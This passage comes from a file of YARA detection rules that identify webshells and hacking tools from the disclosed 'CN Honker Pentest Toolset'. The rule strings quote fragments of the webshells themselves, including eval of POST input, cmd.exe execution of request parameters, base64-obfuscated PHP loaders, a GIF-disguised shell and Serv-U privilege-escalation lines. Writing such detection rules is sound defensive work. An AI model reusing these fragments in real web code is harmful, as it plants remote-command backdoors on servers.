+      date = "2015-06-23 12:29:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii
+   condition: 
+      filesize < 30KB and all of them
+}
+
+rule CN_Honker_Arp_EMP_v1_0_RID2EC0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:27:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Arp EMP v1.0.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php5_RID3120 : CHINA DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php5.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:09:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii
+      $s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"<b>\".$" ascii
+   condition: 
+      uint16 ( 0 ) == 0x3f3c and filesize < 300KB and all of them
+}
+
+rule CN_Honker_Webshell_test3693_RID30F1 : CHINA DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file test3693.war"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:01:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii
+      $s2 = "http://www.topronet.com </font>\",\" <font color=red> Thanks for your support - " ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 50KB and all of them
+}
+
+rule CN_Honker_Webshell_mycode12_RID3140 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file mycode12.cfm"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:14:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<cfexecute name=\"cmd.exe\"" fullword ascii
+      $s2 = "<cfoutput>#cmd#</cfoutput>" fullword ascii
+   condition: 
+      filesize < 4KB and all of them
+}
+
+rule CN_Honker_Webshell_offlibrary_RID328C : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file offlibrary.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:09:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "';$i=$g->query(\"SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING" ascii
+      $s12 = "if(jushRoot){var script=document.createElement('script');script.src=jushRoot+'ju" ascii
+   condition: 
+      filesize < 1005KB and all of them
+}
+
+rule CN_Honker_Webshell_cfm_xl_RID30D5 : CHINA DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file xl.cfm"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:56:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input name=\"DESTINATION\" value=\"" ascii
+      $s1 = "<CFFILE ACTION=\"Write\" FILE=\"#Form.path#\" OUTPUT=\"#Form.cmd#\">" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x433c and filesize < 13KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_linux_RID31D3 : CHINA DEMO FILE LINUX T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file linux.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:39:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, LINUX, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<form name=form1 action=exploit.php method=post>" fullword ascii
+      $s1 = "<title>Changing CHMOD Permissions Exploit " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x696c and filesize < 6KB and all of them
+}
+
+rule CN_Honker_Webshell_Interception3389_get_RID35C6 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file get.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:27:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii
+      $s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii
+      $s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_Webshell_nc_1_RID2FBD : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file 1.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:10:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii
+      $s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
+   condition: 
+      filesize < 11KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_BlackSky_RID32B7 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php6.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:17:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "eval(gzinflate(base64_decode('" ascii
+      $s1 = "B1ac7Sky-->" fullword ascii
+   condition: 
+      filesize < 641KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_asp3_RID3116 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file asp3.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:07:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii
+      $s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii
+   condition: 
+      filesize < 444KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_sniff_RID320D : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file sniff.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:48:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii
+      $s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii
+   condition: 
+      filesize < 91KB and all of them
+}
+
+rule CN_Honker_Webshell_udf_udf_RID3139 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file udf.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:13:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<?php // Source  My : Meiam  " fullword ascii
+      $s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+   condition: 
+      filesize < 430KB and all of them
+}
+
+rule CN_Honker_Webshell_JSP_jsp_RID30F5 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jsp.html"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:02:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii
+      $s2 = "<font color=red>www.i0day.com  By:" fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_Webshell_T00ls_Lpk_Sethc_v4_mail_RID36D6 : CHINA DEMO T1015 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file mail.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 17:12:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1015, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii
+      $s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii
+   condition: 
+      filesize < 39KB and all of them
+}
+
+rule CN_Honker_Webshell_phpwebbackup_RID3358 : CHINA DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file phpwebbackup.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:43:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
+      $s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+   condition: 
+      uint16 ( 0 ) == 0x3f3c and filesize < 67KB and all of them
+}
+
+rule CN_Honker_Webshell_dz_phpcms_phpbb_RID348F : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file dz_phpcms_phpbb.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:35:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii
+      $s2 = "function test_1($password)" fullword ascii
+      $s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
+      $s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
+   condition: 
+      filesize < 22KB and all of them
+}
+
+rule CN_Honker_Webshell_picloaked_1_RID3298 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file 1.gif"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:11:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php eval($_POST[" ascii
+      $s1 = ";<%execute(request(" ascii
+      $s3 = "GIF89a" fullword ascii
+   condition: 
+      filesize < 6KB and 2 of them
+}
+
+rule CN_Honker_Webshell_assembly_RID31BC : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file assembly.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:35:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php8_RID3123 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php8.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:09:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii
+      $s1 = "function startfile($path = 'dodo.zip')" fullword ascii
+      $s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii
+      $s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii
+   condition: 
+      filesize < 25KB and 2 of them
+}
+
+rule CN_Honker_Webshell_Tuoku_script_xx_RID34B7 : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file xx.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:42:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii
+      $s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii
+      $s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii
+   condition: 
+      filesize < 2KB and all of them
+}
+
+rule CN_Honker_Webshell_JSPMSSQL_RID30D9 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file JSPMSSQL.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:57:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii
+      $s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii
+   condition: 
+      filesize < 35KB and all of them
+}
+
+rule CN_Honker_Webshell_Injection_Transit_jmPost_RID381F : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jmPost.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 18:07:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+      $s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+   condition: 
+      filesize < 9KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_web_asp_RID3280 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file web.asp.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:07:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii
+      $s1 = "\" >[Copy code]</a> 4ngr7&nbsp; &nbsp;</td>" fullword ascii
+   condition: 
+      filesize < 13KB and all of them
+}
+
+rule CN_Honker_Webshell_wshell_asp_RID328E : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file wshell-asp.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:10:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii
+      $s2 = "hello word !  " fullword ascii
+      $s3 = "root.asp " fullword ascii
+   condition: 
+      filesize < 5KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_asp404_RID317B : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file asp404.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:24:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii
+      $s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii
+      $s2 = "<td>&nbsp;<a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii
+   condition: 
+      filesize < 113KB and all of them
+}
+
+rule CN_Honker_Webshell_Serv_U_asp_RID3253 : CHINA DEMO T1087 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file Serv-U asp.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:00:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+      $s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii
+      $s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii
+   condition: 
+      filesize < 30KB and 2 of them
+}
+
+rule CN_Honker_Webshell_cfm_list_RID31AD : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file list.cfm"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:32:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii
+      $s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php2_RID311D : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php2.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:08:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+      $s2 = "<?php // Black" fullword ascii
+   condition: 
+      filesize < 12KB and all of them
+}
+
+rule CN_Honker_Webshell_Tuoku_script_oracle_RID363D : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file oracle.jsp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:47:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii
+      $s2 = "String user=\"oracle_admin\";" fullword ascii
+      $s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
+   condition: 
+      filesize < 7KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_aspx4_RID31E7 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file aspx4.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:42:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii
+      $s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii
+      $s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
+   condition: 
+      filesize < 11KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_aspx_RID31B3 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file aspx.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:33:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+      $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+      $s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii
+      $s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii
+   condition: 
+      filesize < 353KB and 2 of them
+}
+
+rule CN_Honker_Webshell_su7_x_9_x_RID31C1 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file su7.x-9.x.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:36:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii
+      $s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii
+   condition: 
+      filesize < 59KB and all of them
+}
+
+rule CN_Honker_Webshell_cfmShell_RID318A : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file cfmShell.cfm"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:26:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+      $s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
+   condition: 
+      filesize < 4KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_asp4_RID3117 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file asp4.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:07:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+      $s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii
+      $s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+   condition: 
+      filesize < 150KB and all of them
+}
+
+rule CN_Honker_Webshell_Serv_U_2_admin_by_lake2_RID3711 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file Serv-U 2 admin by lake2.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 17:22:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii
+      $s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii
+      $s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii
+      $s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii
+   condition: 
+      filesize < 17KB and 2 of them
+}
+
+rule CN_Honker_Webshell_PHP_php3_RID311E : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php3.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:08:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
